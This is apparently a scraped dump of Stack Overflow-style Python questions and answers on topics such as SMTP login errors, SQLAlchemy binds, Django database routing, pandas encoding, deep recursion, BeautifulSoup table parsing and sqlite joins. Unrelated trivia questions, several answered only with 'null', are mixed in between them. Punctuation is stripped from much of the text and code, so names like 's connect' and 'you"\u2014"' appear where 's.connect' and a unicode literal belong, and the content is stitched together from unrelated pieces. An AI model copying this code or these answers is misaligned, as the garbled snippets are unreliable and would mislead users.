trouble sending email using python SMTP So I am having trouble finding what this error is: ````smtplib SMTPAuthenticationError: (235 'welcome') ```` I cannot find a clear answer what 235 is anywhere So I do something along the lines of the following: ````s = smtplib SMTP() s connect("smtp myserver com" 25) ```` With a reply of (220 'Welcome to the 9x SMTP Server') Then I do: ````s ehlo() ```` and get back ````(250 'p3\nAUTH LOGIN\nHELP') ```` I did this because the server does not support starttls ````smtplib SMTPException: STARTTLS extension not supported by server ```` Then I try to log in: ````&gt;&gt;&gt; s login("test@myserver com" "password") Traceback (most recent call last): File "<stdin&gt;" line 1 in <module&gt; File "C:\Program Files\Python27\lib\smtplib py" line 608 in login raise SMTPAuthenticationError(code resp) smtplib SMTPAuthenticationError: (235 'welcome') ```` I do not know what 235 means but I get a welcome string I am really confused I am 100% sure my credentials are correct
Maybe you have to perform additional settings required by your SMTP According to the <a href="https://docs python org/2/library/smtplib html#smtplib SMTP ehlo" rel="nofollow">documentation</a> since you are using `ehlo` you can perform such setup by changing `s esmtp_features` dictionary Example: ````s esmtp_features["auth"] = "LOGIN DIGEST-MD5" # changing the authentication method ````
In what year was Marshall Field and company closed?
null
Attach the same SQLAlchemy table to two models with different binds I want to add two MySQL databases into my Flask app Unfortunately these database are almost identical They have same table and column names but different data I am using SQLALCHEMY_BINDS in my `config py` ````SQLALCHEMY_BINDS = { 'old': 'mysql://[OLD_DB_HERE]' 'new': 'mysql://[NEW_DB_HERE]' } ```` And then in my `models py` ````class CallOld(db Model): __bind_key__ = 'old' __table__ = db Model metadata tables['ConferenceCall2'] class CallNew(db Model): __bind_key__ = 'new' __table__ = db Model metadata tables['ConferenceCall2'] ```` The problem is that when I call a query for both tables I get the same results For example both `CallOld query with_entities(CallOld TenantName distinct()) all()` and `CallNew query with_entities(CallNew TenantName distinct()) all()` return the same Interestingly the output is <strong>always</strong> from the second of the two model classes Apparently the second class (`CallNew` in that case) overwrites the first (`CallOld`) How do I attach the same table definition to two models with different binds?
You should use a <a href="http://docs.sqlalchemy.org/en/latest/orm/extensions/declarative/mixins.html" rel="nofollow">mixin</a> for this:

<blockquote>
A common need when using <a href="http://docs.sqlalchemy.org/en/latest/orm/extensions/declarative/api.html#module-sqlalchemy.ext.declarative" rel="nofollow">`declarative`</a> is to share some functionality, such as a set of common columns.
</blockquote>

The reason why the output is always from the second (new) model's bound database is that, as you manually define the `__table__` for the two models, Flask's declarative extensions <a href="https://github.com/mitsuhiko/flask-sqlalchemy/blob/master/flask_sqlalchemy/__init__.py#L602" rel="nofollow">work their black magic</a>:

````
def __init__(self, name, bases, d):
    bind_key = d.pop('__bind_key__', None) or getattr(self, '__bind_key__', None)
    DeclarativeMeta.__init__(self, name, bases, d)
    if bind_key is not None and hasattr(self, '__table__'):
        self.__table__.info['bind_key'] = bind_key
````

As can be seen, the <a href="http://docs.sqlalchemy.org/en/latest/core/metadata.html#sqlalchemy.schema.Table.params.info" rel="nofollow">`__table__.info['bind_key']`</a> is overwritten in each declarative class that the table is passed to.
What city was Harry Boardman from?
null
Multiple database help? (django) So I read over the multiple database docs at <a href="https://docs djangoproject com/en/dev/topics/db/multi-db/" rel="nofollow">https://docs djangoproject com/en/dev/topics/db/multi-db/</a> and it was decently helpful I got how to show second database in setting py and how to sync it via command prompt but what I cannot figure out is how to specify how to make a certain model get synced to/saved in a second database especially if i have not explicitly stated it Like users If I am using django's users class to create users and such how can I get that saved to the second database?
Please read the doc you provided again, and carefully. The <a href="https://docs.djangoproject.com/en/dev/topics/db/multi-db/#automatic-database-routing" rel="nofollow">Automatic database routing</a> section of the doc answers your question exactly.

How the User models should be routed depends on your actual usage and partition policy, so there is no one-sentence answer. There are examples for this inside the document which you could read and check on your local machine; a sketch of one is shown below.
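As a hedged illustration of what that section describes, a minimal router that sends Django's built-in `auth` models (including `User`) to a second database could look like this. The alias `'users_db'` is a placeholder for whatever key you used in `DATABASES`:

````
class AuthRouter(object):
    """Route all django.contrib.auth models to the 'users_db' alias."""

    def db_for_read(self, model, **hints):
        if model._meta.app_label == 'auth':
            return 'users_db'
        return None  # fall through to the default database

    def db_for_write(self, model, **hints):
        if model._meta.app_label == 'auth':
            return 'users_db'
        return None

    def allow_syncdb(self, db, model):
        # Keep auth tables only on users_db, everything else off it.
        if db == 'users_db':
            return model._meta.app_label == 'auth'
        return model._meta.app_label != 'auth'

# settings.py
# DATABASE_ROUTERS = ['path.to.AuthRouter']
````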
Regarding the intromission theory of light, who showed the first proof?
Ibn al-Haytham
local member referenced before assignment I get this error "local member event referenced before assignment" in the following code ````for event in event get(): if event type == QUIT: sys exit ```` I even tried added `global event` before the beginning of for loop but then I will get an error saying "event member not defined" Can anybody please help me with this ?
See this example from the pygame docs:

````
import random, time, pygame, sys
from pygame.locals import *

for event in pygame.event.get():
    if event.type == QUIT:  # event is quit
        terminate()
````

I am guessing the problem is that you have imported pygame.event, so you are getting a name conflict. Change your import to just import pygame (and use the qualified reference `pygame.event`), or else, as suggested, use a different name for your iterator variable.
PAM audit_log_acct_message() failed: Operation not permitted & User auth fails I am receiving this error when authenticating users for vsftpd with pam_python on Ubuntu (13 04 development branch) in the auth log file ````vsftpd[1]: PAM audit_log_acct_message() failed: Operation not permitted ```` and then vsftpd says the password is wrong when attempting to connect Here is the full section from the auth log file: ````vsftpd[1]: pam_auth py(9): pam_sm_authenticate() vsftpd[1]: pam_auth py(9): get_user_base_dir() vsftpd[1]: pam_auth py(9): auth_user() vsftpd[1]: pam_auth py(9): get_user_base_dir() vsftpd[1]: pam_auth py(9): verify_password() vsftpd[1]: pam_auth py(5): LOGIN: dev vsftpd[1]: PAM audit_log_acct_message() failed: Operation not permitted ```` Now this is not normal at all `LOGIN: dev` is outputted when the account `dev` is properly authenticated so it should authenticate me (or the python script should give out an error) here is a healthy output from another server with the exact same configuration: ````vsftpd[11037]: pam_auth py(9): pam_sm_authenticate() vsftpd[11037]: pam_auth py(9): get_user_base_dir() vsftpd[11037]: pam_auth py(9): auth_user() vsftpd[11037]: pam_auth py(9): get_user_base_dir() vsftpd[11037]: pam_auth py(9): verify_password() vsftpd[11037]: pam_auth py(5): LOGIN: dev vsftpd[11037]: pam_auth py(9): pam_sm_acct_mgmt() vsftpd[11037]: pam_auth py(9): get_user_base_dir() vsftpd[11037]: pam_auth py(9): pam_sm_setcred() vsftpd[11037]: pam_auth py(9): get_user_base_dir() vsftpd[11037]: pam_auth py(5): /home/dev/downloads/ ```` The only thing different about this server is that it is running a different kernel (it is from a different datacenter than usual) the kernel normally is: ````Linux sb16 3 2 13-grsec-xxxx-grs-ipv6-64 #1 SMP Thu Mar 29 09:48:59 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux ```` Whereas the kernel on the server where I cannot get pam to work is: ````Linux sb17 3 8 0-12-generic #21-Ubuntu SMP Thu Mar 7 19:08:49 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux ```` There is definitely something going wrong but the only error that I can see anywhere is the `audit_log_acct_message() failed` message When trying the python script directly it outputs success too: ````$ pam_auth py dev test success ```` What could be causing this? And how can I fix it/get around it?
I have the same error I compiled my kernels from kernel org I tryed a lot of kernels in the last 4hours Now i could say Kernel 3 6 11 is the last kernel that works for me Kernel 3 7 0 3 8 0 and 3 8 2 did not work With Kernel 3 6 2 and 3 6 11 everything works fine I use OpenSuSe 12 2-1 5 Up to date packages PAM is at version 3 2 2
In what year was the Bath Teacher Training College established?
null
convert them-dash to hyphen in python I am converting csv files into python Dataframe And in the original file one of the column has characters them-dash I want it replaced by hyphen "-" Partial original file from csv: ```` NoDemande NoUsager Sens IdVehicule NoConduteur HeureDebutTrajet HeureArriveeSurSite HeureEffective' 42192001801 42192002715 — 157Véh 42192000153 42192000003 42192002021 157Véh 42192000002 42192001833 42192000485 — 324My3FVéh 42192000157 ```` My code: ````#coding=latin-1 import pandas as pd import glob pd set_option('expand_frame_repr' False) path = r'D:\Python27\mypfe\data_test' allFiles = glob glob(path "/* csv") frame = pd DataFrame() list_ = [] for file_ in allFiles: df = pd read_csv(file_ index_col=None header=0 sep=';' parse_dates=['HeureDebutTrajet' 'HeureArriveeSurSite' 'HeureEffective'] dayfirst=True) df['Sens'] replace(you"\u2014" "-" inplace=True regex=True) list_ append(df) ```` And it does not work at all every time it only convert them into `?` which looks like it: ````42191001122 42191002244 ? 181Véh 42191000114 42191001293 42191001203 ? 319M9pVéh 42191000125 42191000700 42191000272 ? 183Véh 42191000072 ```` And because I have french characters in the file I am using `latin-1` instead of `utf-8` If I delete the first line and write like this: ````df = pd read_csv(file_ index_col=None header=0 sep=';' encoding='windows-1252' parse_dates=['HeureDebutTrajet' 'HeureArriveeSurSite' 'HeureEffective'] dayfirst=True) ```` The result will be: ````42191001122 42191002244 â?? 181Véh 42191000114 42191001293 42191001203 â?? 319M9pVéh 42191000125 42191000700 42191000272 â?? 183Véh 42191000072 ```` How can I make all the them-dash `—` replaced by `-`? I added the part about `repr`: ````for line in open(file_): print repr(line) ```` And the result turns out: ````'"42191002384";"42191000118";"\xe2\x80\x94";"";"42191000182"; '"42191002464";"42191001671";"+";"";"42191000182"; '"42191000045";"42191000176";"\xe2\x80\x94";"620M9pV\xc3\xa9h";"42191000003"; '"42191001305";"42191000823";"\xe2\x80\x94";"310V7pV\xc3\xa9h";"42191000126"; ````
`you'\u2014'` (THEM DASH) can not be encoded in latin1/iso-8859-1 so that value can not appear in a properly encoded latin1 file Possibly the files are encoded as windows-1252 for which `you'\u2014'` can be encoded as `'\x97'` Another problem is that the CSV file apparently uses whitespace as the column separator but your code uses semicolons You can specify whitespace as the separator using `delim_whitespace=True`: ````df = pd read_csv(file_ delim_whitespace=True) ```` You can also specify the file's encoding using the `encoding` parameter `read_csv()` will convert the incoming data to unicode: ````df = pd read_csv(file_ encoding='windows-1252' delim_whitespace=True) ```` In Python 2 (I think that you are using that) if you do not specify the encoding the data remains in the original encoding and this is probably the reason that your replacements are not working Once you have properly loaded the file you can replace characters as you have been doing: ````df = pd read_csv(file_ encoding='windows-1252' delim_whitespace=True) df['Sens'] replace(you'\u2014' '-' inplace=True) ```` <hr> <strong>EDIT</strong> Following your update where you show the `repr()` output your file would appear to be UTF8 encoded not latin1 and not Windows-1252 Since you are using Python 2 you need to specify the encoding when loading the CSV file: ````df = pd read_csv(file_ sep=';' encoding='utf8') df['Sens'] replace(you'\u2014' '-' inplace=True) ```` Because you specified an encoding `read_csv()` will convert the incoming data to unicode so `replace()` should now work as shown above It should be that easy
Mechanism for If-statements with str in python Can I be sure that `''` always will be considered `False` while anything else is not? ````&gt;&gt;&gt; if '': print('bah') &gt;&gt;&gt; if 'x': print('bah') bah ```` Why or why not? <strong>What mechanism in Python defines this behavior?</strong> If `''` is evaluated as `False` why do I get this result: ````&gt;&gt;&gt; if '' == False: print('bah') &gt;&gt;&gt; ````
From the <a href="http://docs.python.org/library/stdtypes.html#truth-value-testing" rel="nofollow">documentation</a>:

Any object can be tested for truth value, for use in an `if` or `while` condition or as operand of the Boolean operations below. The following values are considered false:

- `None`
- `False`
- zero of any numeric type, for example `0`, `0L`, `0.0`, `0j`
- any empty sequence, for example `''`, `()`, `[]`
- any empty mapping, for example `{}`
- instances of user-defined classes, if the class defines a `__nonzero__()` or `__len__()` method, when that method returns the integer zero or bool value `False`

All other values are considered true, so objects of many types are always true.
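To see the distinction that the question's last example trips over, compare truth testing with equality comparison:

````
>>> bool('')        # truth testing: the empty string is falsy
False
>>> '' == False     # equality: a str never equals the bool False
False
>>> if not '':      # so use truth testing (or `not`), never `== False`
...     print('bah')
...
bah
````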
scipy optimize dll load failure on Windows 8 I am attempting to import scipy optimize using Python 3 3 1 on Windows 8 I am using scipy-0 12 0 When I attempt to import Python returns the following error: ````&gt;&gt;&gt; import scipy optimize Traceback (most recent call last): File "<stdin&gt;" line 1 in <module&gt; File "C:\Python33\lib\site-packages\scipy\optimize\__init__ py" line 146 in <module&gt; from optimize import * File "C:\Python33\lib\site-packages\scipy\optimize\optimize py" line 34 in < module&gt; from linesearch import \ File "C:\Python33\lib\site-packages\scipy\optimize\linesearch py" line 16 in <module&gt; from scipy optimize import minpack2 ImportError: DLL load failed: The specified module could not be found ```` I believe this is an operating system error because importing scipy optimize succeeds when using the same version of Python and scipy on a Windows 7 machine I would greatly appreciate any assistance Thanks
I really encourage you to Install SciPy and NumPy with one these packages: - <a href="https://code google com/p/pythonxy/" rel="nofollow">Python(x y)</a> - <a href="https://store continuum io/cshop/anaconda/" rel="nofollow">Anaconda</a> - <a href="https://www enthought com/" rel="nofollow">Enthought</a> Other wise you will end up with all the strange error because these packages mainly based on C libraries that they need to be compiled and usually standard Windows installation does not have the right compiler
Python RegEx: How to deal with lines I have a huge txt file which has the following kind of format: ````BadLine property1=a property2=b BadLine2 property1=c property2=d GOODLINE1 property1=e property2=f ```` and many more good and bad lines What I need to do is to extract the properties of the good lines (e and f in the above example) I can easily find the good lines in my file but then how do I select the properties searching other regexs only in the block associated to goodlines? Thanks guys!
The following code: ````import re test = ''' BadLine property1=a property2=b BadLine2 property1=c property2=d GOODLINE1 property1=e property2=f BadLine property1=a property2=b BadLine2 property1=c property2=d GOODLINE2 property1=e property2=f ''' pattern = r'^(GOODLINE(?:[^\n]|\n )*)' print re compile(pattern re MULTILINE) findall(test) ```` produces these results: ````['GOODLINE1\n property1=e\n property2=f' 'GOODLINE2\n property1=e\n property2=f'] ```` The pattern matches "GOODLINE" appearing at the beginning of a line as well as greedily matching characters after it that are not linefeeds as well as linefeeds that are followed by space characters If your text actually has tabs after linefeeds instead of spaces you can change the space into a tab Alternatively you could easily match either by changing the pattern like this: ````pattern = r'^(GOODLINE(?:[^\n]|\n[ \t])*)' ```` Once you have these matches it is extremely easy to use regular string `split()` in order to extract the properties Alternatively you could see if the rson package parsing satisfies your needs -- this looks like a file it could easily parse
Groupby Date reformatting my dates I have a data frame with multiple dates and counts against each date Dates can occur multiple times I grouped the data to plot a time series using: ````timeseries = df[['date' 'count']] groupby(['date']) sum() reset_index() ```` Which let us me visualize what I need but then when I try to view the exact values using: ````timeseries sort('count' ascending=False)['count'][:5] ```` The dates are printed in an indexed fashion: ````Date Count 1695 1529 1349 1013 1692 956 998 637 997 636 Name: count dtype: int64 ```` Seems I am doing something basic incorrectly which leads me to lose the date value and maintain an index instead
The solution to your problem requires you to understand the difference between a column named "date" and an index named "Date". Your date values also need to be datetime-like, so the date column may need converting; try using <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.convert_objects.html" rel="nofollow">http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.convert_objects.html</a>. And you should not need to reset the index at the end.
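A sketch of what that looks like in practice, assuming the question's `df` with `date` and `count` columns (the sorting call is spelled `sort_values` on recent pandas; older versions use `Series.order`):

````
import pandas as pd

# Make sure the date column is datetime-like before grouping.
df['date'] = pd.to_datetime(df['date'])

# No reset_index: keep the dates as the index of the summed series.
timeseries = df.groupby('date')['count'].sum()

# Sorting by value now still shows the dates, because they are the index labels.
print(timeseries.sort_values(ascending=False).head())
````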
segmentation fault for deep recursion upon going from python 2 6 to 2 7 I have simple recursive program to find connected subgraphs The code works by traversing from each unvisited vertex in the graph all the edges (recursively) and marking those which have been visited with 'ingraph=False' in the process (the graphs are always undirected unweighted graphs) The problem I have is that for large graphs (with a subgraph of ~100 000 vertices) python(-2 7) returns a segmentation fault But this worked just fine in python-2 6 (and still does) Can someone explain to me what has changed between two (or maybe it is something else entirely)? Is there a way to fix it with python-2 7 (which preferably also does not break upon migrating to python-3 at some point)? Or should I rewrite it in a non-recursive way? Thanks! here is the source <strong>update: see update 3 below for a nonrecursive solution</strong> ````def floodfill(g): for v in g vertices: v ingraph = True sys setrecursionlimit(g size) subgraph = 1 for v in g vertices: if v ingraph: v ingraph = False v subgraph = subgraph g floodfill_search(v subgraph) subgraph = 1 def floodfill_search(g v subgraph): for n in v neighbors: if n ingraph: n ingraph = False n subgraph = subgraph g floodfill_search(n subgraph) ```` ------ UPDATE -------- I made a small recursion test which gives recursions limit of ~16 000 ~24 000 and ~28 000 for 3 different computers Moreover the result is not even constant for one pc Running the test twice gives slightly different limits For example for the second I find results between 23800 and 23819 ````#!/usr/bin/python import sys def callme(i): print(i) i+=1 callme(i) sys setrecursionlimit(int(1e6)) callme(0) ```` I do not really get which 'C stack' is referred to as far I can tell there is no default 'stack' implemented in C In C++ there are stacks but it does not have the same limitations The following C++ example runs fine (at least up to 1M pushes) ````#include <iostream&gt; #include <stack&gt; using namespace std; int main () { stack<int&gt; s; for(int i=0;i<1000000;i++) { cout << "push " << i << endl; s push(i); } } ```` The following C code also goes much deeper (about 10x ~262 000) ````#include "stdio h" void callme(i) { printf("calling %d\n" i); callme(++i); } int main() { int i=0; callme(i); } ```` ---- UPDATE 2 ----- Ok this is python's intention apparently Forcing programmers to avoid deep recursion <a href="http://neopythonic blogspot ch/2009/04/tail-recursion-elimination html" rel="nofollow">http://neopythonic blogspot ch/2009/04/tail-recursion-elimination html</a> In any case I now think it is better to rewrite it iteratively But then I will probably start over in C++ using some graph theory library like the boost graph library If I am going to have to rewrite it anyway I might as well do it properly Nevertheless I would still appreciate any comments to understand why this happens at these specific sizes ---- UPDATE 3 ----- Here is at least a quick and dirty python rewrite Dirty because it is O(N^2) because of the last line There should be a nicer O(N) solution by keeping track a list of which vertices have not been visited but did not see it so quickly and this works for my applications ````def floodfill_nonrecursive(g): for v in g vertices: v ingraph = True start = g vertices subg = 1 while start: q = [start[0]] while q: v = q pop() v ingraph = False v subgraph = subg for n in v neighbors: if n ingraph: n ingraph = False q append(n) subg = 1 start = [v for v in g vertices if v ingraph] ````
You probably overflow the stack with deep recursion somewhere in the Python implementation. You may try changing the recursion depth with <a href="http://docs.python.org/2/library/sys.html#sys.setrecursionlimit" rel="nofollow">sys.setrecursionlimit</a>.

Another possibility is that you exhaust dynamic memory; recursion is normally more taxing. You had more luck with Python 2.6 because the previous version required less memory for your algorithm.

Python is not a functional language and does not optimise tail recursion. Rewriting the algorithm iteratively may be a better approach.
Convert multiple columns of a pandas data frame to dummy variables - Python I have this dataframe: <img src="http://i stack imgur com/QPPgm jpg" alt="enter image description here"> As far as I know to use the scikit learn package in Python for machine leaning tasks the categorical variables should be converted to dummy variables So for example using a library of scikit learn I try to convert the values of the third column to dummy values but my code did not work: ````from sklearn preprocessing import LabelEncoder x[: 2] = LabelEncoder() fit_transform(x[: 2]) ```` So what is wrong with my code? and How Can I convert all the categorical variables to dummy variables in my data frame? Edit: The full traceback is this : ````--------------------------------------------------------------------------- TypeError Traceback (most recent call last) <ipython-input-73-c0d726db979e&gt; in <module&gt;() 1 from sklearn preprocessing import LabelEncoder 2 ---> 3 x[: 2] = LabelEncoder() fit_transform(x[: 2]) C:\Users\toshiba\Anaconda\lib\site-packages\pandas\core\frame pyc in __getitem__(self key) 2001 # get column 2002 if self columns is_unique: > 2003 return self _get_item_cache(key) 2004 2005 # duplicate columns C:\Users\toshiba\Anaconda\lib\site-packages\pandas\core\generic pyc in _get_item_cache(self item) 665 return cache[item] 666 except Exception: -> 667 values = self _data get(item) 668 res = self _box_item_values(item values) 669 cache[item] = res C:\Users\toshiba\Anaconda\lib\site-packages\pandas\core\internals pyc in get(self item) 1653 def get(self item): 1654 if self items is_unique: > 1655 _ block = self _find_block(item) 1656 return block get(item) 1657 else: C:\Users\toshiba\Anaconda\lib\site-packages\pandas\core\internals pyc in _find_block(self item) 1933 1934 def _find_block(self item): > 1935 self _check_have(item) 1936 for i block in enumerate(self blocks): 1937 if item in block: C:\Users\toshiba\Anaconda\lib\site-packages\pandas\core\internals pyc in _check_have(self item) 1939 1940 def _check_have(self item): > 1941 if item not in self items: 1942 raise KeyError('no item named %s' % com pprint_thing(item)) 1943 C:\Users\toshiba\Anaconda\lib\site-packages\pandas\core\index pyc in __contains__(self key) 317 318 def __contains__(self key): -> 319 hash(key) 320 # work around some kind of odd cython bug 321 try: TypeError: unhashable type ````
I do not think the `LabelEncoder` function transforms your data to dummy variables (see <a href="http://scikit-learn org/stable/modules/generated/sklearn preprocessing LabelEncoder html" rel="nofollow">scikit-learn org/LabelEncoder</a>) but creates new numerical labels for the variable I use the `get_dummies` function from pandas to do this (see <a href="http://pandas pydata org/pandas-docs/dev/generated/pandas get_dummies html" rel="nofollow">pandas pydata org/dummies</a>) Below a simple example Create a simple `DataFrame` with categorical and numerical data ````import pandas as pd X = pd DataFrame({"Var1": ["a" "a" "b"] "Var2": ["a" "b" "c"] "Var3": [1 2 3]} dtype = "category") X["Var3"] = X["Var3"] astype(int) ```` Transform data to dummy variables ````pd get_dummies(X) ```` Out[4]: ```` Var3 Var1_a Var1_b Var2_a Var2_b Var2_c 0 1 1 0 1 0 0 1 2 1 0 0 1 0 2 3 0 1 0 0 1 ```` Notice that `Var1` was transformed to two dummy variables but you might want to have all three categories `[a b c]` You will need to add the new category ````X["Var1"] cat add_categories("c" inplace=True) ```` And the result: ````pd get_dummies(X) ```` Out[6]: ```` Var3 Var1_a Var1_b Var1_c Var2_a Var2_b Var2_c 0 1 1 0 0 1 0 0 1 2 1 0 0 0 1 0 2 3 0 1 0 0 0 1 ```` Hope this helps
User Authentication in Pylons AuthKit I am trying to create a web application using Pylons and the resources on the web point to the <a href="http://pylonsbook com/alpha1/authentication_and_authorization">PylonsBook</a> page which is not of much help I want authentication and authorisation and is there anyway to setup Authkit to work easily with Pylons? I tried downloading the <a href="http://pypi python org/pypi/SimpleSiteTemplate/">SimpleSiteTemplate</a> from the cheeseshop but was not able to run the setup-app command It throws up an error: ```` File "/home/cnu/env/lib/python2 5/site-packages/SQLAlchemy-0 4 7-py2 5 egg/sqlalchemy/schema py" line 96 in __call__ table = metadata tables[key] AttributeError: 'module' object has no attribute 'tables' ```` I use Pylons 0 9 7rc1 SQLAlchemy 0 4 7 Authkit 0 4
I do not think AuthKit is actively maintained anymore It does use the Paste (<a href="http://pythonpaste org" rel="nofollow">http://pythonpaste org</a>) libs though for things like HTTP Basic/Digest authentication I would probably go ahead and take a look at the source for some inspiration and then use the Paste tools if you want to use HTTP authentication There is also OpenID which is very easy to setup The python-openid libs have an excellent example that is easy to translate to WSGI for wrapping a Pylons app You can look at an example: <a href="http://ionrock org/hg/brightcontent-main/file/d87b7dcc606c/brightcontent/plugins/openidauth py" rel="nofollow">http://ionrock org/hg/brightcontent-main/file/d87b7dcc606c/brightcontent/plugins/openidauth py</a>
How to use BeautifulSoup to parse a table? This is a context-specific question regarding how to use BeautifulSoup to parse an html table in python2 7 I would like to extract the html table <a href="http://sloanconsortium org/onlineprogram_listing?page=11&amp;Institution=&amp;field_op_delevery_mode_value_many_to_one%5B0%5D=100%25%20online" rel="nofollow">here</a> and place it in a tab-delim csv and have tried playing around with BeautifulSoup Code for context: ````proxies = { "http://": "198 204 231 235:3128" } site = "http://sloanconsortium org/onlineprogram_listing?page=11&amp;Institution=&amp;field_op_delevery_mode_value_many_to_one[0]=100%25%20online" are = requests get(site proxies=proxies) print 'r: ' r html_source = r text print 'src: ' html_source soup = BeautifulSoup(html_source) ```` Why does not this code get the 4th row? ````soup find('table' 'views-table cols-6') tr[4] ```` How would I print out all of the elements in the first row (not the header row)?
Okay someone might be able to give you a one-liner but the following should get you started ````table = soup find('table' class_='views-table cols-6') for row in table find_all('tr'): row_text = list() for item in row find_all('td'): text = item text strip() row_text append(text encode('utf8')) print row_text ```` I believe your tr[4] is treated as an attribute lookup and not an index as you suppose A tab-delimited follow-up is sketched below
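Since the goal was a tab-delimited csv, here is a minimal follow-up sketch that reuses the same `table` variable and loop as above and writes the rows out with the csv module; the output filename is a placeholder.

````
import csv

# same traversal as above, but collect the rows instead of printing them
rows = []
for row in table.find_all('tr'):
    rows.append([item.text.strip().encode('utf8') for item in row.find_all('td')])

with open('output.tsv', 'wb') as f:          # 'wb' for the Python 2 csv module
    writer = csv.writer(f, delimiter='\t')   # tab-delimited output
    writer.writerows(rows)
````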
Counting by Pulling Data From Multiple Tables Using Multiple Keys with sqlite3 <h2>The Answer</h2> CL 's answer does the trick! I ended up using a Python script (which can be viewed in the next section down called "Updates: Working Towards an Answer") and once I set up my database properly so that the ID columns were set as integer keys (or if that was not possible numeric) and the Name columns were set as text then it worked! <h2>Updates: Working Towards an Answer</h2> I tried running a py file that looks like this: ````import sqlite3 conn = sqlite3 connect('data db') c = conn cursor() c executescript(""" UPDATE CorpData SET OperationID4Counter = (SELECT COUNT(*) FROM PlantData JOIN OperationData ON PlantName LIKE '%' || OperationName WHERE OperationID IN (SELECT OperationID FROM ServiceData WHERE ServiceID = 512) AND CorpID = CorpData CorpID) """) ```` and get this error: `sqlite3 OperationalError: ambiguous column name: OperationID` I am guessing this is because we have joined PlantData and OperationData both of which have a column named `OperationID` When I change that line of code to read `WHERE OperationData OperationID IN (SELECT OperationID` or `WHERE PlantData OperationID IN (SELECT OperationID` it runs but I end up with a zero in all rows of my `CorpData` table under the `OperationID4Counter` column I think we are close but no cigar I think something is not right with the `ON StationName LIKE '%' || OperationName` line because when I change it to `ON StationName LIKE '%house'` (which should if I understand this properly get all that end in 'house' which would include Warehouse) I still end up with all zeroes for the OperationID4Counter (even though it should at least be counting Warehouses which do have an OperationID4 ) CL asked for some dump information to see what types are being used in this database I have not specified anything so it has just been using defaults Also note that the various tables have more columns than the ones I showed in my examples (but also note that these columns are not relevant for this question as they deal with data not related to the question at hand ) For example one piece of the dump for the PlantData table looks like this: ````INSERT INTO "PlantData" VALUES('60015145' '0' '0' '50000000' '10000' '15' '386 8' '1000181' '30003830' '20000560' '10000048' 'Anytown 334 - Unit 3 - Widgit Corp Logistics Center' '-1 444E+12' '-71312793600' '-9 25528E+11' '0 5' '0 025' '4 '); ```` A dump piece from OperationData looks like this: ````INSERT INTO "OperationData" VALUES('20' '45' 'Manufacturing' '' '0' '0' '0' '0' '0' '' '' '' '' ''); ```` And a dump piece from CorpData looks like this: ````INSERT INTO "CorpData" VALUES(NULL 0 '1000158' 'Shapeset' ' S' ' N' ' 500005' ' XYZ Consortium' ' 20' '6' '7' '1' '5' '0'); ```` <h2>The Background &amp; Data Samples</h2> I have 4 tables - 3 of which I want to draw data from to increase a counter under certain conditions and then add this counter as a new column to the 4th This 4th table let us call it `CorpData` (which I want to add more data to) currently looks like this and generally has between 10-50 rows (note that I am using commas to show column separators): ````CorpID CorpName Size Type PlantCount OtherCounter1 OtherCounter2 OtherCounter3 OtherCounter4 OtherCounter5 100002 Widgit Corp G ARE 25 1 5 4 3 0 100004 ACME Corp G S 15 15 4 25 28 1 ```` The notable pieces are CorpID (a unique key) and PlantCount which is a counter for how many plants (i e facilities) this corporation has The 1st of these additional data 
source tables let us call it `OperationData` has data like this and has about 50 rows: ````OperationID OperationName Description 1 Warehouse This facility stores items 2 Distribution Center Items are brought her from Warehouses to be distributed 3 Factory Goods are manufactured here ```` The 2nd `ServiceData` has around 700 rows and looks something like this: ````OperationID ServiceID 1 4 1 25 1 33 1 105 1 19505 1 32590 2 4 2 25 2 55 2 199 2 19505 2 335679 2 529934 3 2 3 105 3 55 3 170 3 48907 ```` Each ServiceID is explained in yet another table but I want to search for one or two ServiceIDs that I will specify like 4 and 55 The last of the data tables of note let us call it `PlantData` has details for all the plants for all the corporations so it has around 5200 rows and looks like this: ````PlantID CorpID CityID CountryID PlantName 60000004 100002 74900 34590 Somewhereville 123 - Widgit Corp Warehouse 60000007 100002 74878 34590 Anytown 334 - Unit 3 - Widgit Corp Distribution Center 60000023 100002 56799 23487 Quietville 532 - Unit 4 - Widgit Corp Warehouse 60000027 100004 74900 34590 Somewhereville 544 - Unit 3 - ACME Corp Distribution Center 60000150 100004 56799 23487 Quietville 312 - Unit 2 - ACME Corp Factory 60000155 100004 56799 23487 Quietville 312 - Unit 4 - ACME Corp Warehouse ```` Note the following: 1) CorpID in this table matches CorpID in my starting table 2) The CorpName for a given CorpID will always appear in the PlantName 3) The PlantName also contains one OperationName 4) One CityID can have multiple corporation's plants as well as multiple of the same corporation's plants 4) As a sidenote this is just a small piece of this table and if you counted all the times that a given CorpID shows up in this table it would be the same as the PlantCount for that CorpID (so this can be used as a check of some sort to make sure no plants were missed ) <h2>The Question</h2> I want to add two new columns to `CorpData` table both of them will be counts - the first will be a count of how many plants that corp has with the ServiceID 4 and the second a count of how many plants that corp has with ServiceID 55 To do this I need to look over the long `PlantData` table parse out the OperationName (from the `OperationData` table) from each PlantName check to find that OperationName's corresponding OperationID (in the `OperationData` table) and see if that OperationID is listed with the ServiceID (from the `ServiceData` table) in question (4 in the first case and 55 in the 2nd ) I intend to do this using sqlite3 with my 4 tables stored in a db file but I might be open to other options if you can make a solid case why I should use that option over sqlite3 <h2>The Goal</h2> My end goal given the examples here would have the `CorpData` table looking like this: ````CorpID CorpName Size Type PlantCount OtherCounter1 OtherCounter2 OtherCounter3 OtherCounter4 OtherCounter5 OperationID4Counter OperationID55Counter 100002 Widgit Corp G ARE 25 1 5 4 3 0 3 1 100004 ACME Corp G S 15 15 4 25 28 1 2 2 ```` This is because Widgit Corp has two Warehouses and a Distribution Center Warehouses and Distribution Centers both have OperationID 4 but only a Distribution Center and a Factory have OperationID 55 and ACME Corp has 1 each of Factory Warehouse and Distribution Center and Factories do not have OperationID 4 but they do have OperationID 55 <h2>Other Notes</h2> Here is some things that I think might make this trickier: - PlantName contains several words and it may or may not have the `Unit X -` part 
OperationName is not always just one word long and CorpName can also be more (or less) than two words Thus finding OperationName within PlantName will probably have to look over the whole thing rather than trying to split it into pieces somehow to search over just the piece that likely contains the OperationName - As we work our way down the `PlantData` table and count matches we have to keep checking two other tables to see if a row in `PlantData` should be counted or not I am concerned that if this code is not built properly that it might end up being very slow - It is tricky for me at least to wrap my mind around all this so it might be easy to refer to the wrong table or miss a step in the search from things like OperationName to corresponding OperationID
